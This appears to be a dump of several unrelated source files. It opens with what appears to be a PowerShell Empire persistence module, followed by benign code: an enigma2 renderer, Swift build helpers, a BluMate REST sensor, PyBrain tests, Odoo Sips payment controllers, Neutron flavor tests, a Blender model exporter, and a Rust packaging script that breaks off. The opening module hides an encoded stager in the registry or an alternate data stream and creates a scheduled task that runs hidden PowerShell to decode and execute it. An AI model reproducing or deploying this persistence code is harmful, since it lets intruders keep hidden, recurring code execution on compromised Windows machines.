'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if idleTime != '':
script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
return script
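# --- Hedged usage sketch (comments only; mirrors how Empire's module loader
# drives this class, with an illustrative listener name and options) ---
# module = Module(mainMenu, params=[('Listener', 'test'), ('DailyTime', '10:30')])
# script = module.generate()  # returns the PowerShell one-liner, or '' on error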
| bsd-3-clause |
sklnet/opendroid-enigma2 | lib/python/Components/Renderer/DMCHDCaids.py | 11 | 2849 | #
# Caids - Renderer
#
# Coded by Dr.Best (c) 2010
# Support: www.dreambox-tools.info
#
# This plugin is licensed under the Creative Commons
# Attribution-NonCommercial-ShareAlike 3.0 Unported
# License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc-sa/3.0/ or send a letter to Creative
# Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
#
# Alternatively, this plugin may be distributed and executed on hardware which
# is licensed by Dream Multimedia GmbH.
# This plugin is NOT free software. It is open source, you are allowed to
# modify it (if you keep the license), but it may not be commercially
# distributed other than under the conditions noted above.
#
from Renderer import Renderer
from enigma import eCanvas, eRect, gFont
from skin import parseColor, parseFont
class DMCHDCaids(Renderer):
GUI_WIDGET = eCanvas
def __init__(self):
Renderer.__init__(self)
self.backgroundColor = parseColor("#ff000000")
self.nocColor = parseColor("#00aaaaaa")
self.emmColor = parseColor("#00aaaaaa")
self.ecmColor = parseColor("#0056c856")
self.font = gFont("Regular", 20)
def pull_updates(self):
if self.instance is None:
return
self.instance.clear(self.backgroundColor)
caidlist = self.source.getCaidlist
if caidlist is None:
return
self.draw(caidlist)
def draw(self, caidlist):
offset = 0
pointSize = self.font.pointSize
for key in caidlist:
if caidlist[key][0]:
if caidlist[key][1] == 0:
foregroundColor = self.nocColor
elif caidlist[key][1] == 1:
foregroundColor = self.emmColor
else:
foregroundColor = self.ecmColor
length = len(caidlist[key][0]) * (pointSize)
self.instance.writeText(eRect(offset, 0, length, pointSize), foregroundColor, self.backgroundColor, self.font, caidlist[key][0], 2)
offset = offset + length
def changed(self, what):
self.pull_updates()
def applySkin(self, desktop, parent):
attribs = [ ]
from enigma import eSize
def parseSize(str):
x, y = str.split(',')
return eSize(int(x), int(y))
for (attrib, value) in self.skinAttributes:
if attrib == "size":
self.instance.setSize(parseSize(value))
attribs.append((attrib,value))
elif attrib == "nocColor":
self.nocColor = parseColor(value)
elif attrib == "emmColor":
self.emmColor = parseColor(value)
elif attrib == "ecmColor":
self.ecmColor = parseColor(value)
elif attrib == "font":
self.font = parseFont(value, ((1,1),(1,1)))
elif attrib == "backgroundColor":
self.backgroundColor = parseColor(value)
self.instance.clear(self.backgroundColor)
attribs.append((attrib,value))
else:
attribs.append((attrib,value))
self.skinAttributes = attribs
return Renderer.applySkin(self, desktop, parent)
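# --- Hedged usage sketch (comments only; an illustrative skin entry for this
# renderer -- the attribute names match applySkin() above and the source is
# assumed to provide getCaidlist) ---
# <widget render="DMCHDCaids" source="session.CurrentService"
#         position="10,10" size="400,24" font="Regular;20"
#         ecmColor="#0056c856" backgroundColor="#ff000000" />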
| gpl-2.0 |
calebd/swift | utils/swift_build_support/swift_build_support/workspace.py | 38 | 3857 | # swift_build_support/workspace.py ------------------------------*- python -*-
#
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
# ----------------------------------------------------------------------------
"""
Represent whole source tree and the build directory
"""
# ----------------------------------------------------------------------------
import os.path
class Workspace(object):
def __init__(self, source_root, build_root):
self.source_root = source_root
self.build_root = build_root
def source_dir(self, path):
return os.path.join(self.source_root, path)
def build_dir(self, deployment_target, product):
return os.path.join(self.build_root,
'%s-%s' % (product, deployment_target))
def compute_build_subdir(args):
# Create a name for the build directory.
build_subdir = args.cmake_generator.replace(" ", "_")
cmark_build_dir_label = args.cmark_build_variant
if args.cmark_assertions:
cmark_build_dir_label += "Assert"
llvm_build_dir_label = args.llvm_build_variant
if args.llvm_assertions:
llvm_build_dir_label += "Assert"
swift_build_dir_label = args.swift_build_variant
if args.swift_assertions:
swift_build_dir_label += "Assert"
if args.swift_analyze_code_coverage != "false":
swift_build_dir_label += "Coverage"
swift_stdlib_build_dir_label = args.swift_stdlib_build_variant
if args.swift_stdlib_assertions:
swift_stdlib_build_dir_label += "Assert"
# FIXME: mangle LLDB build configuration into the directory name.
if (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Use a simple directory name if all projects use the same build
# type.
build_subdir += "-" + llvm_build_dir_label
elif (llvm_build_dir_label != swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Swift build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+swift-" + swift_build_dir_label
elif (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label != swift_stdlib_build_dir_label and
swift_build_dir_label == cmark_build_dir_label):
# Swift stdlib build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+stdlib-" + swift_stdlib_build_dir_label
elif (llvm_build_dir_label == swift_build_dir_label and
llvm_build_dir_label == swift_stdlib_build_dir_label and
swift_build_dir_label != cmark_build_dir_label):
# cmark build type differs.
build_subdir += "-" + llvm_build_dir_label
build_subdir += "+cmark-" + cmark_build_dir_label
else:
# We don't know how to create a short name, so just mangle in all
# the information.
build_subdir += "+cmark-" + cmark_build_dir_label
build_subdir += "+llvm-" + llvm_build_dir_label
build_subdir += "+swift-" + swift_build_dir_label
build_subdir += "+stdlib-" + swift_stdlib_build_dir_label
# If we have a sanitizer enabled, mangle it into the subdir.
if args.enable_asan:
build_subdir += "+asan"
if args.enable_ubsan:
build_subdir += "+ubsan"
if args.enable_tsan:
build_subdir += "+tsan"
return build_subdir
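# --- Hedged illustration (not part of the build script proper) ---
def _demo_compute_build_subdir():
    """Show the short-name path taken when every project shares a build type."""
    import argparse
    args = argparse.Namespace(
        cmake_generator='Ninja',
        cmark_build_variant='Debug', cmark_assertions=True,
        llvm_build_variant='Debug', llvm_assertions=True,
        swift_build_variant='Debug', swift_assertions=True,
        swift_analyze_code_coverage='false',
        swift_stdlib_build_variant='Debug', swift_stdlib_assertions=True,
        enable_asan=False, enable_ubsan=False, enable_tsan=False)
    return compute_build_subdir(args)  # -> 'Ninja-DebugAssert'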
| apache-2.0 |
bdfoster/blumate | blumate/components/binary_sensor/rest.py | 1 | 2622 | """
Support for RESTful binary sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/binary_sensor.rest/
"""
import logging
from blumate.components.binary_sensor import (BinarySensorDevice,
SENSOR_CLASSES)
from blumate.components.sensor.rest import RestData
from blumate.const import CONF_VALUE_TEMPLATE
from blumate.helpers import template
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'REST Binary Sensor'
DEFAULT_METHOD = 'GET'
# pylint: disable=unused-variable
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the REST binary sensor."""
resource = config.get('resource', None)
method = config.get('method', DEFAULT_METHOD)
payload = config.get('payload', None)
verify_ssl = config.get('verify_ssl', True)
sensor_class = config.get('sensor_class')
if sensor_class not in SENSOR_CLASSES:
_LOGGER.warning('Unknown sensor class: %s', sensor_class)
sensor_class = None
rest = RestData(method, resource, payload, verify_ssl)
rest.update()
if rest.data is None:
_LOGGER.error('Unable to fetch Rest data')
return False
add_devices([RestBinarySensor(
hass,
rest,
config.get('name', DEFAULT_NAME),
sensor_class,
config.get(CONF_VALUE_TEMPLATE))])
# pylint: disable=too-many-arguments
class RestBinarySensor(BinarySensorDevice):
"""Representation of a REST binary sensor."""
def __init__(self, hass, rest, name, sensor_class, value_template):
"""Initialize a REST binary sensor."""
self._hass = hass
self.rest = rest
self._name = name
self._sensor_class = sensor_class
self._state = False
self._value_template = value_template
self.update()
@property
def name(self):
"""Return the name of the binary sensor."""
return self._name
@property
def sensor_class(self):
"""Return the class of this sensor."""
return self._sensor_class
@property
def is_on(self):
"""Return true if the binary sensor is on."""
if self.rest.data is None:
return False
if self._value_template is not None:
self.rest.data = template.render_with_possible_json_value(
self._hass, self._value_template, self.rest.data, False)
return bool(int(self.rest.data))
def update(self):
"""Get the latest data from REST API and updates the state."""
self.rest.update()
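# --- Hedged configuration sketch (comments only; an illustrative YAML entry
# exercising the options read in setup_platform above) ---
# binary_sensor:
#   platform: rest
#   resource: http://192.168.1.10/state
#   value_template: '{{ value_json.motion }}'
#   sensor_class: motion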
| mit |
rbalda/neural_ocr | env/lib/python2.7/site-packages/pybrain/tests/unittests/test_capturegame_network.py | 4 | 1378 | """
Build a CaptureGameNetwork with LSTM cells
>>> from pybrain.structure.networks.custom import CaptureGameNetwork
>>> from pybrain import MDLSTMLayer
>>> size = 2
>>> n = CaptureGameNetwork(size = size, componentclass = MDLSTMLayer, hsize = 1, peepholes = False)
Check it's string representation
>>> print n
CaptureGameNetwork-s2-h1-MDLSTMLayer--...
Modules:
[<BiasUnit 'bias'>, <LinearLayer 'input'>, <MDLSTMLayer 'hidden(0, 0, 0)'>, ... <MDLSTMLayer 'hidden(0, 0, 3)'>, <SigmoidLayer 'output'>]
Connections:
[<IdentityConnection ...
Check some of the connections dimensionalities
>>> c1 = n.connections[n['hidden(1, 0, 3)']][0]
>>> c2 = n.connections[n['hidden(0, 1, 2)']][-1]
>>> print c1.indim, c1.outdim
1 1
>>> print c2.indim, c2.outdim
1 1
>>> n.paramdim
21
Try writing it to an xml file, reread it and determine if it looks the same:
>>> from pybrain.tests import xmlInvariance
>>> xmlInvariance(n)
Same representation
Same function
Same class
Check its gradient:
>>> from pybrain.tests import gradientCheck
>>> gradientCheck(n)
Perfect gradient
True
"""
__author__ = 'Tom Schaul, tom@idsia.ch'
from pybrain.tests import runModuleTestSuite
if __name__ == '__main__':
runModuleTestSuite(__import__('__main__'))
| mit |
BT-rmartin/odoo | addons/payment_sips/controllers/main.py | 153 | 1864 | # -*- coding: utf-8 -*-
try:
import simplejson as json
except ImportError:
import json
import logging
import werkzeug
from openerp import http
from openerp.http import request
_logger = logging.getLogger(__name__)
class SipsController(http.Controller):
_notify_url = '/payment/sips/ipn/'
_return_url = '/payment/sips/dpn/'
def _get_return_url(self, **post):
""" Extract the return URL from the data coming from sips. """
return_url = post.pop('return_url', '')
if not return_url:
tx_obj = request.registry['payment.transaction']
data = tx_obj._sips_data_to_object(post.get('Data'))
custom = json.loads(data.pop('returnContext', False) or '{}')
return_url = custom.get('return_url', '/')
return return_url
def sips_validate_data(self, **post):
res = False
env = request.env
tx_obj = env['payment.transaction']
acquirer_obj = env['payment.acquirer']
sips = acquirer_obj.search([('provider', '=', 'sips')], limit=1)
security = sips._sips_generate_shasign(post)
if security == post['Seal']:
_logger.debug('Sips: validated data')
res = tx_obj.sudo().form_feedback(post, 'sips')
else:
_logger.warning('Sips: data are corrupted')
return res
@http.route([
'/payment/sips/ipn/'],
type='http', auth='none', methods=['POST'])
def sips_ipn(self, **post):
""" Sips IPN. """
self.sips_validate_data(**post)
return ''
@http.route([
'/payment/sips/dpn'], type='http', auth="none", methods=['POST'])
def sips_dpn(self, **post):
""" Sips DPN """
return_url = self._get_return_url(**post)
self.sips_validate_data(**post)
return werkzeug.utils.redirect(return_url)
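# --- Hedged usage sketch (comments only; field values are illustrative) ---
# Sips posts a form-encoded 'Data' payload plus a 'Seal' digest; validation
# recomputes the shasign over the payload and compares:
# post = {'Data': 'amount=100|currencyCode=978|responseCode=00',
#         'Seal': '<sha digest computed by Sips>'}
# SipsController().sips_validate_data(**post)  # truthy only when Seal matches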
| agpl-3.0 |
mmnelemane/neutron | neutron/tests/api/test_flavors_extensions.py | 23 | 6787 | # Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from neutron.tests.api import base
from neutron.tests.tempest import test
LOG = logging.getLogger(__name__)
class TestFlavorsJson(base.BaseAdminNetworkTest):
"""
Tests the following operations in the Neutron API using the REST client for
Neutron:
List, Show, Create, Update, Delete Flavors
List, Show, Create, Update, Delete service profiles
"""
@classmethod
def resource_setup(cls):
super(TestFlavorsJson, cls).resource_setup()
if not test.is_extension_enabled('flavors', 'network'):
msg = "flavors extension not enabled."
raise cls.skipException(msg)
service_type = "LOADBALANCER"
description_flavor = "flavor is created by tempest"
name_flavor = "Best flavor created by tempest"
cls.flavor = cls.create_flavor(name_flavor, description_flavor,
service_type)
description_sp = "service profile created by tempest"
# Future TODO(madhu_ak): Right now the dummy driver is loaded. Will
# make changes as soon I get to know the flavor supported drivers
driver = ""
metainfo = '{"data": "value"}'
cls.service_profile = cls.create_service_profile(
description=description_sp, metainfo=metainfo, driver=driver)
def _delete_service_profile(self, service_profile_id):
# Deletes a service profile and verifies if it is deleted or not
self.admin_client.delete_service_profile(service_profile_id)
# Asserting that service profile is not found in list after deletion
labels = self.admin_client.list_service_profiles(id=service_profile_id)
self.assertEqual(len(labels['service_profiles']), 0)
@test.attr(type='smoke')
@test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
def test_create_update_delete_service_profile(self):
# Creates a service profile
description = "service_profile created by tempest"
driver = ""
metainfo = '{"data": "value"}'
body = self.admin_client.create_service_profile(
description=description, driver=driver, metainfo=metainfo)
service_profile = body['service_profile']
# Updates a service profile
self.admin_client.update_service_profile(service_profile['id'],
enabled=False)
self.assertTrue(service_profile['enabled'])
# Deletes a service profile
self.addCleanup(self._delete_service_profile,
service_profile['id'])
# Assert whether created service profiles are found in service profile
# lists or fail if created service profiles are not found in service
# profiles list
labels = (self.admin_client.list_service_profiles(
id=service_profile['id']))
self.assertEqual(len(labels['service_profiles']), 1)
@test.attr(type='smoke')
@test.idempotent_id('ec8e15ff-95d0-433b-b8a6-b466bddb1e50')
def test_create_update_delete_flavor(self):
# Creates a flavor
description = "flavor created by tempest"
service = "LOADBALANCERS"
name = "Best flavor created by tempest"
body = self.admin_client.create_flavor(name=name, service_type=service,
description=description)
flavor = body['flavor']
# Updates a flavor
self.admin_client.update_flavor(flavor['id'], enabled=False)
self.assertTrue(flavor['enabled'])
# Deletes a flavor
self.addCleanup(self._delete_flavor, flavor['id'])
# Assert whether created flavors are found in flavor lists or fail
# if created flavors are not found in flavors list
labels = (self.admin_client.list_flavors(id=flavor['id']))
self.assertEqual(len(labels['flavors']), 1)
@test.attr(type='smoke')
@test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
def test_show_service_profile(self):
# Verifies the details of a service profile
body = self.admin_client.show_service_profile(
self.service_profile['id'])
service_profile = body['service_profile']
self.assertEqual(self.service_profile['id'], service_profile['id'])
self.assertEqual(self.service_profile['description'],
service_profile['description'])
self.assertEqual(self.service_profile['metainfo'],
service_profile['metainfo'])
self.assertEqual(True, service_profile['enabled'])
@test.attr(type='smoke')
@test.idempotent_id('30abb445-0eea-472e-bd02-8649f54a5968')
def test_show_flavor(self):
# Verifies the details of a flavor
body = self.admin_client.show_flavor(self.flavor['id'])
flavor = body['flavor']
self.assertEqual(self.flavor['id'], flavor['id'])
self.assertEqual(self.flavor['description'], flavor['description'])
self.assertEqual(self.flavor['name'], flavor['name'])
self.assertEqual(True, flavor['enabled'])
@test.attr(type='smoke')
@test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
def test_list_flavors(self):
# Verify flavor lists
body = self.admin_client.list_flavors(id=33)
flavors = body['flavors']
self.assertEqual(0, len(flavors))
@test.attr(type='smoke')
@test.idempotent_id('e2fb2f8c-45bf-429a-9f17-171c70444612')
def test_list_service_profiles(self):
# Verify service profiles lists
body = self.admin_client.list_service_profiles(id=33)
service_profiles = body['service_profiles']
self.assertEqual(0, len(service_profiles))
def _delete_flavor(self, flavor_id):
# Deletes a flavor and verifies if it is deleted or not
self.admin_client.delete_flavor(flavor_id)
# Asserting that the flavor is not found in list after deletion
labels = self.admin_client.list_flavors(id=flavor_id)
self.assertEqual(len(labels['flavors']), 0)
class TestFlavorsIpV6TestJSON(TestFlavorsJson):
_ip_version = 6
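# --- Hedged usage note (comments only; the exact invocation depends on the
# job configuration) ---
# These API tests are driven by the tempest-based runner, e.g. something like:
#   tox -e api -- neutron.tests.api.test_flavors_extensions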
| apache-2.0 |
Berling/project-zombye-exporter | io_exporter_zombye/export_zmdl.py | 1 | 8360 | # The MIT License (MIT)
#
# Copyright (c) 2015 Georg Schäfer
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import bmesh
import bpy
import json
def triangulate(obj):
mesh = bmesh.new()
mesh.from_mesh(obj.data)
bmesh.ops.triangulate(mesh, faces=mesh.faces)
return mesh
def mesh_data(obj, bone_ids):
mesh = triangulate(obj)
meshdata = {}
vertices_lookup = {}
vertices = []
indices = []
submeshes = {}
write_skin = False
vertex_groups = obj.vertex_groups
dvert_layer = mesh.verts.layers.deform.active
if bone_ids is not None and vertex_groups is not None and dvert_layer is not None:
write_skin = True
uv_layer = mesh.loops.layers.uv.active
if uv_layer is None:
raise TypeError("mesh %s has no active uv layer" %obj.data.name)
for material_slot in obj.material_slots:
material = material_slot.material
if material.users > 0:
submeshes[material.name] = {}
submeshes[material.name]["indices"] = []
submeshes[material.name]["textures"] = {}
texture_slots = material.texture_slots
textures = ["diffuse", "normal", "material"]
for texture in textures:
for key, value in texture_slots.items():
if texture in key:
submeshes[material.name]["textures"][texture] = bpy.path.abspath(value.texture.image.filepath)
break
else:
submeshes[material.name]["textures"][texture] = ""
for face in mesh.faces:
triangle = []
for loop in face.loops:
vertex = loop.vert
position = vertex.co
normal = face.normal
if face.smooth:
normal = vertex.normal
texcoord = loop[uv_layer].uv
vertexattributes = {}
vertexattributes["position"] = [position.x, position.y, position.z]
vertexattributes["texcoord"] = [texcoord.x, 1.0 - texcoord.y]
vertexattributes["normal"] = [normal.x, normal.y, normal.z]
vertex_tupel = (
vertexattributes["position"][0],
vertexattributes["position"][1],
vertexattributes["position"][2],
vertexattributes["texcoord"][0],
vertexattributes["texcoord"][1],
vertexattributes["normal"][0],
vertexattributes["normal"][1],
vertexattributes["normal"][2]
)
if vertex_tupel not in vertices_lookup:
vertices_lookup[vertex_tupel] = len(vertices)
vertices.append(vertexattributes)
triangle.append(vertices_lookup[vertex_tupel])
if write_skin:
dvert = vertex[dvert_layer]
if len(dvert.values()) > 4:
raise ValueError("vertex is assigned to too many vertex groups")
                if len(dvert.values()) == 0:
                    # no deform group assigned: bind the vertex fully to the root bone
                    vertexattributes["indices"] = [0]
                    vertexattributes["weights"] = [1.0]
else:
vertexattributes["indices"] = []
vertexattributes["weights"] = []
for key, value in dvert.items():
bone_name = vertex_groups[key].name
index = bone_ids[bone_name]
vertexattributes["indices"].append(index)
vertexattributes["weights"].append(value)
material = obj.material_slots[face.material_index].material
submeshes[material.name]["indices"].append(triangle)
meshdata["vertices"] = vertices
meshdata["submeshes"] = submeshes
mesh.free()
del mesh
return meshdata
from mathutils import Matrix, Quaternion
def anim_data(armature, bone_ids):
armature_data = {}
armature_data["skeleton"] = {}
ids = 0
armature_data["bone_hierachy"] = {}
for i in range(0, len(armature.bones)):
armature_data["bone_hierachy"][i] = []
for bone in armature.bones:
bone_data = {}
if bone.name not in bone_ids:
bone_ids[bone.name] = ids
ids += 1
bone_data["id"] = bone_ids[bone.name]
parent = bone.parent
parent_transformation = Matrix()
parent_transformation.identity()
if parent is None:
bone_data["parent"] = None
else:
if parent.name not in bone_ids:
bone_ids[parent.name] = ids
ids += 1
bone_data["parent"] = bone_ids[parent.name]
parent_transformation = armature.bones[bone_data["parent"]].matrix_local
armature_data["bone_hierachy"][bone_data["parent"]].append(bone_data["id"])
transformation = parent_transformation.inverted() * bone.matrix_local
rot = transformation.to_quaternion()
rot.normalize()
bone_data["rotation"] = [rot.w, rot.x, rot.y, rot.z]
pos = transformation.to_translation()
bone_data["translation"] = [pos.x, pos.y, pos.z]
scale = transformation.to_scale()
bone_data["scale"] = [scale.x, scale.y, scale.z]
armature_data["skeleton"][bone_ids[bone.name]] = bone_data
armature_data["animations"] = {}
for action in bpy.data.actions:
armature_data["animations"][action.name] = {}
frame_range = action.frame_range
armature_data["animations"][action.name]["length"] = frame_range[1] - frame_range[0]
armature_data["animations"][action.name]["tracks"] = {}
old_name = ""
for fcu in action.fcurves:
bone_name = fcu.data_path
bone_name = bone_name[12:len(bone_name)]
bone_name = bone_name[0:bone_name.find("\"")]
bone_id = bone_ids[bone_name]
if bone_name not in armature_data["animations"][action.name]["tracks"]:
armature_data["animations"][action.name]["tracks"][bone_name] = {}
armature_data["animations"][action.name]["tracks"][bone_name]["id"] = bone_id
transformation_name = fcu.data_path
transformation_name = transformation_name[transformation_name.rfind(".") + 1:len(transformation_name)]
trans = armature_data["animations"][action.name]["tracks"][bone_name]
if transformation_name not in trans:
trans[transformation_name] = []
            index = 0
            for keyframe in fcu.keyframe_points:
                # the first fcurve of a transformation creates one entry per
                # keyframe; sibling channels (e.g. location y/z) then append
                # their component to the entries already created
                if transformation_name != old_name:
                    trans[transformation_name].append({})
                    trans[transformation_name][-1]["frame"] = keyframe.co.x - frame_range[0]
                    trans[transformation_name][-1]["data"] = []
                trans[transformation_name][index]["data"].append(keyframe.co.y)
                index += 1
            old_name = transformation_name
return armature_data
def write_json(file, data):
json.dump(data, file, indent="\t", separators=(',', ' : '))
def write_model(filepath, selected, parallax_mapping):
models = {}
objects = None
if selected:
objects = bpy.context.selected_objects
else:
objects = bpy.data.objects
for obj in objects:
if obj.users > 0 and obj.type == 'MESH' and obj.name[0:3] != 'WGT':
armature = obj.find_armature()
if armature is not None:
models[obj.name] = {}
bone_ids = {}
models[obj.name].update(anim_data(armature.data, bone_ids))
models[obj.name].update(mesh_data(obj, bone_ids))
else:
models[obj.name] = mesh_data(obj, None)
models[obj.name]["parallax"] = parallax_mapping
file = open(filepath, 'w', encoding='utf-8')
write_json(file, models)
file.close()
return {"FINISHED"}
from bpy.props import StringProperty, BoolProperty, EnumProperty
from bpy.types import Operator
from bpy_extras.io_utils import ExportHelper
class export_zmdl(Operator, ExportHelper):
"""Exporter for the zombye model format"""
bl_idname = "zmdl.export"
bl_label = "Export ZMDL"
filename_ext = ".zmdl"
filter_glob = StringProperty(
default="*.zmdl",
options={'HIDDEN'}
)
selected = BoolProperty(
name="selected",
description="Export only selected objects.",
default=False
)
parallax_mapping = BoolProperty(
name="parallax",
description="Enable parallax displacement mapping for this model.",
default=True
)
def execute(self, context):
return write_model(self.filepath, self.selected, self.parallax_mapping)
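# --- Hedged usage sketch (comments only; assumes the operator has been
# registered with Blender first) ---
# import bpy
# bpy.utils.register_class(export_zmdl)
# bpy.ops.zmdl.export(filepath='/tmp/model.zmdl', selected=True,
#                     parallax_mapping=True)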
| mit |
tempbottle/rust-packaging | package-rust.py | 2 | 13929 | #!/usr/bin/env python2.7
# Copyright 2015 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
import sys, os, subprocess, shutil, datetime, glob
# Parse configuration
make_comb = True
make_exe = False
make_pkg = False
make_msi = False
msi_sval = False # skip msi validation
target = None
for arg in sys.argv:
if arg == "--no-combined":
make_comb = False
elif arg == "--exe":
make_exe = True
elif arg == "--pkg":
make_pkg = True
elif arg == "--msi":
make_msi = True
elif arg == "--msi-sval":
msi_sval = True
elif "--target" in arg:
target = arg.split("=")[1]
print
print "target: " + str(target)
print "combined: " + str(make_comb)
print "exe: " + str(make_exe)
print "pkg: " + str(make_pkg)
print "msi: " + str(make_msi)
print
if target is None:
print "specify --target"
sys.exit(1)
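# Example invocation (illustrative): build the combined installer plus a
# Windows .exe for a GNU target:
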